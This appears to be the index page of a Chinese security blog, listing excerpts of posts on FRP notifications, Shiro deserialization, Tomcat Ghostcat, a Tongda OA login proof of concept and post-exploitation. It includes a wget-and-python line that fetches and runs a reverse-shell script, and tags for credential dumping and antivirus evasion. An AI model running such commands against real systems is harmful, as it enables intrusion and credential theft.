人若无名便可专心练剑 | 分类：工具

FRP代理钉钉通知

主要项目：https://github.com/arugal/frp-notify可以直接下载release版本即可，或者自行使用realse.sh进行编译。目录介绍frp-notify└───system||frp-notify.service#linux系统服务配置文件|│frp-notify#

发布于 · 2020-07-13 · #frp #frp代理软件 #frp代理钉钉通知

最新文章

FRP代理钉钉通知

主要项目：https://github.com/arugal/frp-notify可以直接下载release版本即可，或者自行使用realse.sh进行编译。目录介绍frp-notify└───system||frp-notify.service#linux系统服务配置文件|│frp-notify#

Shiro反序列化无文件回显

今天突然看到一个项目发现很不错。https://github.com/j1anFen/ysoserial_echo支持：ApereoCAS4.1.X默认密钥Shirospring环境下回显Liferayprotal7.0以上本地复现环境Vulhub环境搭建git下来后，直接在ysoserial_ec

「Tips」命令执行无回显无法反弹shell的后续操作

我一般在遇到Java反序列化可以命令执行后，会选择用python的方式反弹shell。先wget下载wgethttp://123.123.123.123/shell.py-O/tmp/shell.py然后再执行python/tmp/shell.py这样一般不用去考虑符号带来的编码问题了。虽然要繁琐些

Tomcat幽灵猫漏洞实战

前言：公司项目上遇到的一个传销站，是一个Thinkphp3.0的。尝试了payload进行注入后，发现只有一个盲注。于是就去找找有没有相同站点，拿个源码来审计审计。搜索到一个相同站点下存在8009端口的ajp协议和一个8080端口的tomcat站点，于是就想到了幽灵猫漏洞。发现使用Jspst

「漏洞复现」通达OA任意用户登陆

直接上POC热乎着的GET/general/login_code.phpHTTP/1.1Host:192.168.91.131Pragma:no-cacheCache-Control:no-cacheUpgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(

分类

工具 1593115068035

小技巧 1590506915066

漏洞复现 vulnhub

杂记 1578377560604

权限维持 1577677481988

红蓝对抗 redteam

标签

frp代理钉钉通知 frp代理钉钉通知

frp代理软件 frp代理软件

无文件无文件

Shiro反序列化 shiro反序列化

微信解密 1593115099474

微信聊天记录解密 1593115099470

命令执行 1590506843774

无回显 1590506843757

CNVD-2020-10487 cnvd-2020-10487

Tomcat幽灵猫 tomcat

CVE-2020-1938 cve-2020-1938

实战 1588140261114

CVE-2020-2555 cve-2020-2555

漏洞复现 1587026226930

CVE-2020-2551 cve-2020-2551

Weblogic weblogic

总结 1578377564263

记录SSH密码 ssh

权限维持 1577677497553

红队 1577245982632

Credential Dumping credential-dumping

抓取密码 1577242318501

Mimikatz mimikatz

ProcDump procdump

Simple-Loader simple-loader

绕过windows defender windows-defender

MSbuild msbuild

远控上线 1576224996894

反弹shell shell

PowerShell powershell

BypassAV bypassav

PowerLine powerline